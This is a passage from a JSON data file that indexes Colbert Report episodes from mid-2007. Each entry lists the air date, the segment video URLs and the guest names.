        "http://thecolbertreport.cc.com/videos/6uc0h1/fred-thompson-on-fire",
        "http://thecolbertreport.cc.com/videos/g52jco/stephen-benjamin",
        "http://thecolbertreport.cc.com/videos/0agktt/bears---balls---summer-vacation-edition",
        "http://thecolbertreport.cc.com/videos/a0p792/daniel-b--smith",
        "http://thecolbertreport.cc.com/videos/llk3nk/sign-off---the-land-of-nod"
      ],
      "guest": "Daniel B. Smith"
    },
    {
      "date": "2007-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwup1e/intro---6-18-07",
        "http://thecolbertreport.cc.com/videos/k3t99j/papal-encounter",
        "http://thecolbertreport.cc.com/videos/rbx9fh/the-price-is-right",
        "http://thecolbertreport.cc.com/videos/w0pe9q/the-word---mcconaughey",
        "http://thecolbertreport.cc.com/videos/yfclcj/stephen-on-itunes",
        "http://thecolbertreport.cc.com/videos/7jalja/tip-wag---arnold-schwarzenegger",
        "http://thecolbertreport.cc.com/videos/ozfwje/toby-keith"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2007-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ndbsf6/intro---6-19-07",
        "http://thecolbertreport.cc.com/videos/qxyadz/secret-clapton-concert",
        "http://thecolbertreport.cc.com/videos/0y4kih/marybeth-garrigan",
        "http://thecolbertreport.cc.com/videos/mzxikb/countdown-to-armageddon",
        "http://thecolbertreport.cc.com/videos/ij3mgr/alpha-dog-of-the-week---robert-bork",
        "http://thecolbertreport.cc.com/videos/u1dk1e/anne-marie-slaughter",
        "http://thecolbertreport.cc.com/videos/kxk02d/sign-off---manifesto"
      ],
      "guest": "Harriet the Eagle with handler, Anne-Marie Slaughter"
    },
    {
      "date": "2007-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jbdbyq/intro---6-20-07",
        "http://thecolbertreport.cc.com/videos/beccdu/bloomberg-for-president",
        "http://thecolbertreport.cc.com/videos/xe5j30/the-word---justice",
        "http://thecolbertreport.cc.com/videos/4yziuf/cheating-death---colgate",
        "http://thecolbertreport.cc.com/videos/7m9bgr/will-schwalbe",
        "http://thecolbertreport.cc.com/videos/glo9c6/sign-off---job-well-done"
      ],
      "guest": "Will Schwalbe"
    },
    {
      "date": "2007-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/um7qsm/intro---6-21-07",
        "http://thecolbertreport.cc.com/videos/psamg7/ron-paul-s-colbert-bump",
        "http://thecolbertreport.cc.com/videos/38xzef/difference-makers---tim-donnelly",
        "http://thecolbertreport.cc.com/videos/2oyfu8/vincent-bugliosi",
        "http://thecolbertreport.cc.com/videos/dlqbr6/sign-off---goodbye-to-mr--wizard",
        "http://thecolbertreport.cc.com/videos/35278z/the-word---porking"
      ],
      "guest": "Vincent Bugliosi"
    },
    {
      "date": "2007-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wvrrio/intro---6-25-07",
        "http://thecolbertreport.cc.com/videos/xvrdq7/the-freegans",
        "http://thecolbertreport.cc.com/videos/dqezp0/the-word---fourth-branch",
        "http://thecolbertreport.cc.com/videos/oldt6o/threatdown---coral-reefs",
        "http://thecolbertreport.cc.com/videos/mhjtgw/tom-hayden",
        "http://thecolbertreport.cc.com/videos/5zivhy/sign-off---contract"
      ],
      "guest": "Tom Hayden"
    },
    {
      "date": "2007-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2dxfpk/intro---6-26-07",
        "http://thecolbertreport.cc.com/videos/id2z8d/christmas-in-june",
        "http://thecolbertreport.cc.com/videos/eelu64/tony-blair-s-conversion",
        "http://thecolbertreport.cc.com/videos/tpff57/the-word---elsewhere",
        "http://thecolbertreport.cc.com/videos/0t819z/christmas-presents",
        "http://thecolbertreport.cc.com/videos/5awnum/alpha-dog-of-the-week---fred-thompson",
        "http://thecolbertreport.cc.com/videos/1uvv46/david-france",
        "http://thecolbertreport.cc.com/videos/96ew1f/sign-off---visions-of-sugarplums"
      ],
      "guest": "David France"
    },
    {
      "date": "2007-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/47zhcv/intro---6-27-07",
        "http://thecolbertreport.cc.com/videos/y34h2c/give-stephen-an-iphone",
        "http://thecolbertreport.cc.com/videos/wepdgq/tom-blanton",
        "http://thecolbertreport.cc.com/videos/f6in26/four-horsemen-of-the-a-pop-calypse---shaq",
        "http://thecolbertreport.cc.com/videos/msuhoe/daniel-gilbert"
      ],
      "guest": "Tom Blanton, Daniel Gilbert"
    },
    {
      "date": "2007-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ftc2tr/intro---6-28-07",
        "http://thecolbertreport.cc.com/videos/2o9nj2/spot-the-difference",
        "http://thecolbertreport.cc.com/videos/kb8br0/civil-unrest-in-iran",
        "http://thecolbertreport.cc.com/videos/0lfyqf/the-word---profiles-in-timing",
        "http://thecolbertreport.cc.com/videos/owh6vd/colbert-platinum---luxury-car-wrecks",
        "http://thecolbertreport.cc.com/videos/f9y6wb/doug-bailey",
        "http://thecolbertreport.cc.com/videos/oxeeoj/sign-off---going-on-vacation"
      ],
      "guest": "Doug Bailey"
    },
    {
      "date": "2007-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rsv8g9/intro---7-16-07",
        "http://thecolbertreport.cc.com/videos/bwablo/tunneling-to-free-scooter-libby",
        "http://thecolbertreport.cc.com/videos/lnroz7/richard-florida",
        "http://thecolbertreport.cc.com/videos/scrz03/difference-makers---johnna-mink",
        "http://thecolbertreport.cc.com/videos/r0qxf5/ben-nelson",
        "http://thecolbertreport.cc.com/videos/zabqma/sign-off---take-five"
      ],
      "guest": "Richard Florida, Sen. Ben Nelson"
    },
    {
      "date": "2007-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cliw91/intro---7-17-07",
        "http://thecolbertreport.cc.com/videos/zl176l/all-night-senate-session",
        "http://thecolbertreport.cc.com/videos/depupc/the-word---victimcrite",
        "http://thecolbertreport.cc.com/videos/hdn59k/1-428-minutes-to-go",
        "http://thecolbertreport.cc.com/videos/gafa5t/tip-wag---michael-chertoff-s-gut-o-meter",
        "http://thecolbertreport.cc.com/videos/ev6dp9/mark-moffett",
        "http://thecolbertreport.cc.com/videos/1jb3qq/threatdown---500-threat-marathon"
      ],
      "guest": "Mark Moffett"
    },
    {
      "date": "2007-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uf8wpk/intro---7-18-07",
        "http://thecolbertreport.cc.com/videos/gn1bt7/2007-filibustacular",
        "http://thecolbertreport.cc.com/videos/hqa77b/the-word---smiley-face",
        "http://thecolbertreport.cc.com/videos/ysfdjx/pope-goes-green",
        "http://thecolbertreport.cc.com/videos/artj1e/alpha-dog-of-the-week---david-beckham",
        "http://thecolbertreport.cc.com/videos/ga3vsc/john-mellencamp"
      ],
      "guest": "John Mellencamp"
    },
    {
      "date": "2007-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/19mw0q/intro---7-19-07",
        "http://thecolbertreport.cc.com/videos/1esv0i/republican-candidates--suffering",
        "http://thecolbertreport.cc.com/videos/a9zoea/michael-moore",
        "http://thecolbertreport.cc.com/videos/bn2nox/march-to-enslavement---stephen-gets-an-iphone",
        "http://thecolbertreport.cc.com/videos/9p0lhk/frank-sulloway",
        "http://thecolbertreport.cc.com/videos/qhp9z3/sign-off---length-of-the-show-contest"
      ],
      "guest": "Frank Sulloway"
    },
    {
      "date": "2007-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nc8xh3/intro---7-23-07",
        "http://thecolbertreport.cc.com/videos/fkxqbr/stephen-s-fountain-of-youth",
        "http://thecolbertreport.cc.com/videos/4rqgp5/the-word---premium-package",
        "http://thecolbertreport.cc.com/videos/l0ig1p/colbert-platinum---private-submarines",
        "http://thecolbertreport.cc.com/videos/6e6gd1/simon-schama",
        "http://thecolbertreport.cc.com/videos/vfxa7p/sign-off---just-about-out-of-time"
      ],
      "guest": "Simon Schama"
    },
    {
      "date": "2007-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/15l5ov/intro---7-24-07",
        "http://thecolbertreport.cc.com/videos/d9v0fp/bush-s-butt",
        "http://thecolbertreport.cc.com/videos/nvdygh/the-word---modest-porpoisal",
        "http://thecolbertreport.cc.com/videos/e5420t/movies-that-are-destroying-america--chuck-and-larry",
        "http://thecolbertreport.cc.com/videos/yqgj2h/anthony-romero",
        "http://thecolbertreport.cc.com/videos/alsjeo/joining-the-illuminati"
      ],
      "guest": "Anthony D. Romero"
    },
    {
      "date": "2007-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/shyero/intro---7-25-07",
        "http://thecolbertreport.cc.com/videos/4md3eg/daily-kos",
        "http://thecolbertreport.cc.com/videos/ikcdyi/the-word---no-regrets",
        "http://thecolbertreport.cc.com/videos/bdjzxb/thompson-campaign",
        "http://thecolbertreport.cc.com/videos/bc0mf3/hometown-hero-town---bryce-canyon-city",
        "http://thecolbertreport.cc.com/videos/2f2r58/charles-kaiser"
      ],
      "guest": "Charles Kaiser"
    },
    {
      "date": "2007-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wth3ve/intro---7-26-07",
        "http://thecolbertreport.cc.com/videos/3or3gc/how-did-stephen-break-his-wrist-",
        "http://thecolbertreport.cc.com/videos/if6h6s/industrial-hemp---medical-marijuana---aaron-houston",
        "http://thecolbertreport.cc.com/videos/8p2na8/advice-to-the-gods---nepalese-pre-teen-goddesses",
        "http://thecolbertreport.cc.com/videos/kcb6kk/bob-shrum"
      ],
      "guest": "Robert Shrum"
    },
    {
      "date": "2007-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8m5y0f/intro---7-30-07",
        "http://thecolbertreport.cc.com/videos/tyo2os/wrist-violence---glorification",
        "http://thecolbertreport.cc.com/videos/9e0vz0/pollution-immigration",
        "http://thecolbertreport.cc.com/videos/brdooe/the-word---solidarity",
        "http://thecolbertreport.cc.com/videos/ii5xvp/threatdown---scottish-surgeons",
        "http://thecolbertreport.cc.com/videos/o55kxd/evan-osnos"
      ],
      "guest": "Evan Osnos"
    },
    {
      "date": "2007-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/01xv20/intro---7-31-07",
        "http://thecolbertreport.cc.com/videos/bgyn76/wrist-violence-epidemic",
        "http://thecolbertreport.cc.com/videos/aryder/smokin--pole---arc--who-goes-there-",
        "http://thecolbertreport.cc.com/videos/tg3umi/the-word---special-prosecutor",
        "http://thecolbertreport.cc.com/videos/egvqvt/rupert-murdoch-purchases-the-wall-street-journal",
        "http://thecolbertreport.cc.com/videos/i9cr44/sport-report---barry-bonds",
        "http://thecolbertreport.cc.com/videos/3tom79/kathleen-kennedy-townsend"
      ],
      "guest": "Kathleen Kennedy Townsend"
    },
    {
      "date": "2007-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jtpqex/intro---8-1-07",
        "http://thecolbertreport.cc.com/videos/b8kbe8/dr--jerry-vizzone",
        "http://thecolbertreport.cc.com/videos/zd2nvn/the-word---college-credit",
        "http://thecolbertreport.cc.com/videos/nlqwhc/when-animals-attack-our-morals---hollywood-pigeons",
        "http://thecolbertreport.cc.com/videos/agisiu/michael-beschloss",
        "http://thecolbertreport.cc.com/videos/a0yv9l/30-minute-anniversary"
      ],
      "guest": "Michael Beschloss"
    },
    {
      "date": "2007-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qjky5n/farewell-ingmar-bergman"
      ],
      "guest": "Michael J. Behe"
    },
    {
      "date": "2007-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tqb1ek/intro---8-2-07",
        "http://thecolbertreport.cc.com/videos/4fa4lg/superhighway",
        "http://thecolbertreport.cc.com/videos/sg9xg3/rick-macarthur",
        "http://thecolbertreport.cc.com/videos/vc3b3c/thighmasters-for-the-troops",
        "http://thecolbertreport.cc.com/videos/ptvqa7/sport-report---barry-smash",
        "http://thecolbertreport.cc.com/videos/z81ulz/michael-behe"
      ],
      "guest": "Michael J. Behe"
    },
    {
      "date": "2007-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7r677j/intro---8-7-07",
        "http://thecolbertreport.cc.com/videos/4kw9z4/yearly-kos-convention",
        "http://thecolbertreport.cc.com/videos/f3w2rh/the-word---the-dark-side",
        "http://thecolbertreport.cc.com/videos/zwnri3/better-know-a-protectorate---american-samoa---eni-faleomavaega",
        "http://thecolbertreport.cc.com/videos/d21xmf/ian-bogost",
        "http://thecolbertreport.cc.com/videos/kzlukl/sign-off---colbert-commonsensicals"
      ],
      "guest": "Ian Bogost"
    },
    {
      "date": "2007-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4f7upv/intro---8-8-07",
        "http://thecolbertreport.cc.com/videos/oxms8d/wrist-watch---fighting-back",
        "http://thecolbertreport.cc.com/videos/jtqjr6/jim-cramer",
        "http://thecolbertreport.cc.com/videos/nveh3o/bears---balls---bootlegging",
        "http://thecolbertreport.cc.com/videos/7zavlx/tina-brown"
      ],
      "guest": "Jim Cramer, Tina Brown"
    },
    {
      "date": "2007-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hutdl7/intro---8-9-07",
        "http://thecolbertreport.cc.com/videos/3abho5/the-word---clarity",
        "http://thecolbertreport.cc.com/videos/qp6xha/tip-wag---bloomberg",
        "http://thecolbertreport.cc.com/videos/h9y997/judd-apatow",
        "http://thecolbertreport.cc.com/videos/161mvg/sign-off---toenails"
      ],
      "guest": "Judd Apatow"
    },
    {
      "date": "2007-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1833p0/intro---8-13-07",
        "http://thecolbertreport.cc.com/videos/gavjew/rove-resigns",
        "http://thecolbertreport.cc.com/videos/qu995y/the-word---white-guy",
        "http://thecolbertreport.cc.com/videos/bruhc9/threatdown---bats",
        "http://thecolbertreport.cc.com/videos/fk3k31/michael-jacobson",
        "http://thecolbertreport.cc.com/videos/dnjitq/sign-off---americone-dream"
      ],
      "guest": "Michael Jacobson"
    },
    {
      "date": "2007-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0imzs4/dna--could-it-happen-to-you----jackknife",
        "http://thecolbertreport.cc.com/videos/n35y17/jerry-miller",
        "http://thecolbertreport.cc.com/videos/5o7ie1/dr--spencer-wells",
        "http://thecolbertreport.cc.com/videos/x03vyw/dna--could-it-happen-to-you----incrimination"
      ],
      "guest": "Jerry Miller, Spencer Wells"
    },
    {
      "date": "2007-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6o4ihx/intro---8-15-07",
        "http://thecolbertreport.cc.com/videos/rv9k9s/jewish-colbert-ancestry",
        "http://thecolbertreport.cc.com/videos/3zlayh/markos-moulitsas",
        "http://thecolbertreport.cc.com/videos/6mvd9x/monkey-on-the-lam---oliver",
        "http://thecolbertreport.cc.com/videos/zp4iw7/the-word---potential",
        "http://thecolbertreport.cc.com/videos/734nxn/michael-wallis",
        "http://thecolbertreport.cc.com/videos/z4d4y4/sign-off---doctor-s-orders"
      ],
      "guest": "Michael Wallis"
    },
    {
      "date": "2007-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ns0g26/intro---8-16-07",
        "http://thecolbertreport.cc.com/videos/14jprr/colbert-branson-trainwreck",
        "http://thecolbertreport.cc.com/videos/kgguey/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/fnrvrc/cheating-death---gene-therapy",
        "http://thecolbertreport.cc.com/videos/u8nc37/andrew-keen"
      ],
      "guest": "Andrew Keen"
    },
    {
      "date": "2007-08-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tfnhsy/intro---8-20-07",
        "http://thecolbertreport.cc.com/videos/xo98yh/wriststrong-bracelets",
        "http://thecolbertreport.cc.com/videos/us6itk/the-word---made-in-iraq",
        "http://thecolbertreport.cc.com/videos/9a8i9h/nailed--em---northern-border",
        "http://thecolbertreport.cc.com/videos/o9ho2y/nathan-sawaya"
      ],
      "guest": "Nathan Sawaya"
    },
    {
      "date": "2007-08-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2gjr3w/intro---8-21-07",
        "http://thecolbertreport.cc.com/videos/bcfeni/smokin--pole---global-warming",
        "http://thecolbertreport.cc.com/videos/7gfsui/the-word---self-determination",
        "http://thecolbertreport.cc.com/videos/v4twhy/formidable-opponent---terrorism",
        "http://thecolbertreport.cc.com/videos/4o129i/michael-shermer"
      ],
      "guest": "Michael Shermer"
    },
    {
      "date": "2007-08-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v8cwuz/intro---8-22-07",
        "http://thecolbertreport.cc.com/videos/k7oqos/foreshadowing",
        "http://thecolbertreport.cc.com/videos/9snnh5/the-word---november-surprise",
        "http://thecolbertreport.cc.com/videos/ymi1da/where-in-the-world-is-matt-lauer-s-wriststrong-bracelet-",
        "http://thecolbertreport.cc.com/videos/r18bn4/colbert-platinum---san-tropez",
        "http://thecolbertreport.cc.com/videos/xxwsh0/richard-branson",
        "http://thecolbertreport.cc.com/videos/eb410v/doused"
      ],
      "guest": "Richard Branson"
    },
    {
      "date": "2007-08-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w3z5w0/intro---8-23-07",
        "http://thecolbertreport.cc.com/videos/uc4umy/cheney-s-pre-emptive-strike",
        "http://thecolbertreport.cc.com/videos/en1mx1/thomas-ricks",
        "http://thecolbertreport.cc.com/videos/xjgukn/fractured-freedom",
        "http://thecolbertreport.cc.com/videos/0arcqm/wrist-cast-signatories",
        "http://thecolbertreport.cc.com/videos/3xfbbo/free-at-last",
        "http://thecolbertreport.cc.com/videos/qta5f5/the-auction-begins-"
      ],
      "guest": "Thomas Ricks"
    },
    {
      "date": "2007-09-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/844a7k/intro---9-10-07",
        "http://thecolbertreport.cc.com/videos/vdvpmz/kicking-the-habit",
        "http://thecolbertreport.cc.com/videos/p14g3t/the-word---honor-bound",
        "http://thecolbertreport.cc.com/videos/2qi5qf/cast-auction",
        "http://thecolbertreport.cc.com/videos/u1yamr/bjorn-lomborg"
      ],
      "guest": "Bjorn Lomborg"
    },
    {
      "date": "2007-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hy8je4/intro---9-11-07",
        "http://thecolbertreport.cc.com/videos/3l7k3j/general-betray-us",
        "http://thecolbertreport.cc.com/videos/5yaj4x/indecision-2008--don-t-f--k-this-up-america---the-kickoff",
        "http://thecolbertreport.cc.com/videos/mjzhz2/the-word---southsourcing",
        "http://thecolbertreport.cc.com/videos/5z4esb/katie-bruggeman---exclusive",
        "http://thecolbertreport.cc.com/videos/o07u14/garrison-keillor"
      ],
      "guest": "Garrison Keillor"
    },
    {
      "date": "2007-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5njj1/intro---9-12-07",
        "http://thecolbertreport.cc.com/videos/8lpy3i/1-888-mops-key",
        "http://thecolbertreport.cc.com/videos/7hc8lx/the-word---re-run",
        "http://thecolbertreport.cc.com/videos/r6x2pm/michael-bloomberg",
        "http://thecolbertreport.cc.com/videos/3rano7/tek-jansen---beginning-s-first-dawn--episode-one",
        "http://thecolbertreport.cc.com/videos/n46uq9/joel-klein",
        "http://thecolbertreport.cc.com/videos/pc4v8w/klein-s-penance"
      ],
      "guest": "Joel Klein"
    },
    {
      "date": "2007-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tduyob/intro---9-13-07",
        "http://thecolbertreport.cc.com/videos/rvio16/the-emmys",
        "http://thecolbertreport.cc.com/videos/g1gps7/father-james-martin",
        "http://thecolbertreport.cc.com/videos/9unkmu/wriststrong",
        "http://thecolbertreport.cc.com/videos/5c8kig/ed-begley-jr-",
        "http://thecolbertreport.cc.com/videos/9mwknn/stephen-for-president---answering-the-call"
      ],
      "guest": "Ed Begley Jr."
    },
    {
      "date": "2007-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tr81w4/intro---9-18-07",
        "http://thecolbertreport.cc.com/videos/6l9i7j/the-word---let-my-people-go",
        "http://thecolbertreport.cc.com/videos/6we8r4/difference-makers---nitro-girl",
        "http://thecolbertreport.cc.com/videos/jx6a68/susan-sarandon"
      ],
      "guest": "Susan Sarandon"
    },
    {
      "date": "2007-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lv4fuw/intro---9-19-07",
        "http://thecolbertreport.cc.com/videos/zeoen2/ed-asner-dials-the-atone-phone",
        "http://thecolbertreport.cc.com/videos/0aau1u/the-word---solitarity",
        "http://thecolbertreport.cc.com/videos/7ooxuh/colbert-platinum---green-edition",
        "http://thecolbertreport.cc.com/videos/nnhbey/naomi-wolf"
      ],
      "guest": "Naomi Wolf"
    },
    {
      "date": "2007-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fojlm8/intro---9-20-07",
        "http://thecolbertreport.cc.com/videos/0ek76n/rabbi-fish",
        "http://thecolbertreport.cc.com/videos/2h18lo/blistering-rebuttal",
        "http://thecolbertreport.cc.com/videos/z6i9oa/the-word---market-forces",
        "http://thecolbertreport.cc.com/videos/b5qfpk/threatdown---us",
        "http://thecolbertreport.cc.com/videos/wthvm9/jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/1pktzf/craziest-f--king-thing-i-ve-ever-heard---mayo-kitchen"
      ],
      "guest": "Jeffrey Toobin"
    },
    {
      "date": "2007-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tgxkym/intro---9-24-07",
        "http://thecolbertreport.cc.com/videos/kwfydk/the-word---na-na-na-na-na-na",
        "http://thecolbertreport.cc.com/videos/zztck4/alpha-dog-of-the-week---honniball",
        "http://thecolbertreport.cc.com/videos/l00qbc/the-metric-system",
        "http://thecolbertreport.cc.com/videos/pkz7i5/thomas-l--friedman",
        "http://thecolbertreport.cc.com/videos/emtni3/sign-off---stephen-accepts-your-apologies"
      ],
      "guest": "Thomas Friedman"
    },
    {
      "date": "2007-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yrize5/intro---9-25-07",
        "http://thecolbertreport.cc.com/videos/cminr7/no-nuclear-iran",
        "http://thecolbertreport.cc.com/videos/2g01er/indecision-2008--don-t-f--k-this-up-america---giuliani",
        "http://thecolbertreport.cc.com/videos/bjhu7f/k--david-harrison",
        "http://thecolbertreport.cc.com/videos/b5cc0e/tip-wag---muslim-hipsters",
        "http://thecolbertreport.cc.com/videos/5ny4ja/john-grisham"
      ],
      "guest": "John Grisham"
    },
    {
      "date": "2007-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ups73z/intro---9-26-07",
        "http://thecolbertreport.cc.com/videos/rn3hke/forgiving-bennett",
        "http://thecolbertreport.cc.com/videos/agyblq/canadian-dollar",
        "http://thecolbertreport.cc.com/videos/nj93xu/the-word---a-word-from-our-sponsors",
        "http://thecolbertreport.cc.com/videos/0iswbv/sam-waterston",
        "http://thecolbertreport.cc.com/videos/79m504/tony-bennett"
      ],
      "guest": "Tony Bennett"
    },
    {
      "date": "2007-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i67egh/intro---9-27-07",
        "http://thecolbertreport.cc.com/videos/o502gv/king-tut",
        "http://thecolbertreport.cc.com/videos/mhmga5/democratic-presidential-debate---the-clintons",
        "http://thecolbertreport.cc.com/videos/th2rny/the-word---early-immunization",
        "http://thecolbertreport.cc.com/videos/ev9qqd/david-schwartz",
        "http://thecolbertreport.cc.com/videos/q0vng8/sign-off---bear-in-the-woods"
      ],
      "guest": "David Schwartz"
    },
    {
      "date": "2007-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4vmpg2/intro---10-1-07",
        "http://thecolbertreport.cc.com/videos/s3koea/on-notice---dennis-kucinich",
        "http://thecolbertreport.cc.com/videos/e5dl9b/the-word---evitable",
        "http://thecolbertreport.cc.com/videos/7s7h6l/cheating-death---sleep",
        "http://thecolbertreport.cc.com/videos/5wkeol/charlie-savage",
        "http://thecolbertreport.cc.com/videos/g86mf6/sign-off---all-night-date"
      ],
      "guest": "Charlie Savage"
    },
    {
      "date": "2007-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ycsxc/intro---10-2-07",
        "http://thecolbertreport.cc.com/videos/ws1a9l/end-of-the-universe",
        "http://thecolbertreport.cc.com/videos/boxkhr/the-real-showdown",
        "http://thecolbertreport.cc.com/videos/f1ovth/the-word---troops-out-now",
        "http://thecolbertreport.cc.com/videos/berne3/nailed--em---cyberrorists",
        "http://thecolbertreport.cc.com/videos/non4mf/john-mearsheimer",
        "http://thecolbertreport.cc.com/videos/yxngw7/what-number-is-stephen-thinking-of----between-one-and-ten"
      ],
      "guest": "John Mearsheimer"
    },
    {
      "date": "2007-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/77zwpl/intro---10-3-07",
        "http://thecolbertreport.cc.com/videos/rsugzz/krugman-correction",
        "http://thecolbertreport.cc.com/videos/ujxs1h/gay-roundup---dan-savage",
        "http://thecolbertreport.cc.com/videos/ttvyxm/alpha-dog-of-the-week---president-bush",
        "http://thecolbertreport.cc.com/videos/bohex1/monkey-on-the-lam---missouri",
        "http://thecolbertreport.cc.com/videos/1scf3a/jim-lovell"
      ],
      "guest": "Jim Lovell"
    },
    {
      "date": "2007-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6takag/intro---10-4-07",
        "http://thecolbertreport.cc.com/videos/9ie5cp/fred-thompson-s-lackluster-candidacy",
        "http://thecolbertreport.cc.com/videos/t9j9vd/the-word---catastrophe",
        "http://thecolbertreport.cc.com/videos/ze1fvk/threatdown---science-and-technology-edition",
        "http://thecolbertreport.cc.com/videos/i58e8l/john-kao",
        "http://thecolbertreport.cc.com/videos/jy5aw2/an--i-am-america--and-so-can-you----success-story"
      ],
      "guest": "John Kao"
    },
    {
      "date": "2007-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zjbyqa/intro---10-8-07",
        "http://thecolbertreport.cc.com/videos/pw4m4c/doggie-co-author",
        "http://thecolbertreport.cc.com/videos/xkdwvy/the-word---medium-matters",
        "http://thecolbertreport.cc.com/videos/56gzq7/balls-for-kidz---schip",
        "http://thecolbertreport.cc.com/videos/og377e/george-saunders",
        "http://thecolbertreport.cc.com/videos/p6057q/sign-off---i-am-america--and-so-can-you---day"
      ],
      "guest": "George Saunders"
    },
    {
      "date": "2007-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q3jijk/intro---10-9-07",
        "http://thecolbertreport.cc.com/videos/plzp6y/i-am-america-on-sale-now-",
        "http://thecolbertreport.cc.com/videos/ubbze1/new-reagan-coin",
        "http://thecolbertreport.cc.com/videos/597azm/the-word---mighty-duck",
        "http://thecolbertreport.cc.com/videos/1znjlb/obama-s-lapel",
        "http://thecolbertreport.cc.com/videos/x1wzb3/the-stephen-colbert-interview",
        "http://thecolbertreport.cc.com/videos/r0xdzt/sign-off---lead-free-ink"
      ],
      "guest": "Stephen Colbert"
    },
    {
      "date": "2007-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vsm7hv/intro---10-10-07",
        "http://thecolbertreport.cc.com/videos/4ht7gm/dead-to-me---pocketmaster",
        "http://thecolbertreport.cc.com/videos/79ara8/the-word---americon-dream",
        "http://thecolbertreport.cc.com/videos/dzvdm0/tip-wag---bruce-springsteen",
        "http://thecolbertreport.cc.com/videos/97z30b/wesley-clark"
      ],
      "guest": "Gen. Wesley Clark"
    },
    {
      "date": "2007-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sprkvb/intro---10-11-07",
        "http://thecolbertreport.cc.com/videos/a27soa/black-haired-guy-who-isn-t-steve-doocy",
        "http://thecolbertreport.cc.com/videos/o6xiyi/frank-gaffney",
        "http://thecolbertreport.cc.com/videos/zipx3v/colbert-platinum---kidz-edition",
        "http://thecolbertreport.cc.com/videos/zv1po1/chris-jordan"
      ],
      "guest": "Chris Jordan"
    },
    {
      "date": "2007-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/56sadv/intro---10-15-07",
        "http://thecolbertreport.cc.com/videos/9esznw/who-s-honoring-me-now----marie-claire",
        "http://thecolbertreport.cc.com/videos/oogvcb/the-word---enviro-medal-disaster",
        "http://thecolbertreport.cc.com/videos/cmpb1d/kucinich-s-pockets",
        "http://thecolbertreport.cc.com/videos/biff8k/paul-glastris"
      ],
      "guest": "Dennis Kucinich, Paul Glastris"
    },
    {
      "date": "2007-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6k009y/intro---10-16-07",
        "http://thecolbertreport.cc.com/videos/0pl61p/planet-in-peril",
        "http://thecolbertreport.cc.com/videos/f97ynd/indecision-2008--don-t-f--k-this-up-america---presidential-bid",
        "http://thecolbertreport.cc.com/videos/9phoww/jeff-greenfield",
        "http://thecolbertreport.cc.com/videos/9j5u2v/bob-drogin"
      ],
      "guest": "Bob Drogin, Jeff Greenfield"
    },
    {
      "date": "2007-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e6jgx6/intro---10-17-07",
        "http://thecolbertreport.cc.com/videos/el4ceo/the-big-news",
        "http://thecolbertreport.cc.com/videos/ps9172/hail-to-the-cheese---filing-papers",
        "http://thecolbertreport.cc.com/videos/duz61o/threatdown---anniversary",
        "http://thecolbertreport.cc.com/videos/dvoers/garry-kasparov",
        "http://thecolbertreport.cc.com/videos/e0223g/sign-off---revenge-is-sweet"
      ],
      "guest": "Garry Kasparov"
    },
    {
      "date": "2007-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i4a6fg/intro---10-18-07",
        "http://thecolbertreport.cc.com/videos/z3kzwl/pumpkin-shortage",
        "http://thecolbertreport.cc.com/videos/6o9coa/global-scrunching---anderson-cooper",
        "http://thecolbertreport.cc.com/videos/p1wo65/hail-to-the-cheese---campaign-coverage-finance",
